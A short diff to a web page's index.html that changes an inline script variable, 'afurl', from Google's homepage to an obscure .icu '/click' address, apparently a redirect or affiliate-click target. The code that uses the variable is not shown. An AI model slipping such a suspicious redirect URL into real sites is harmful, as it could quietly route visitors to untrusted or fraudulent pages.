--- a/index.html
+++ b/index.html
@@ -17,7 +17,7 @@
     <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.2/animate.min.css" integrity="sha256-PHcOkPmOshsMBC+vtJdVr5Mwb7r0LkSVJPlPrp/IMpU=" crossorigin="anonymous" />
     <link rel="stylesheet" type="text/css" href="css/main.css">
     <script>
-        var afurl = 'https://www.google.com/';
+        var afurl = 'https://pields-ladayeast.icu/click';
     </script>
 </head>
 
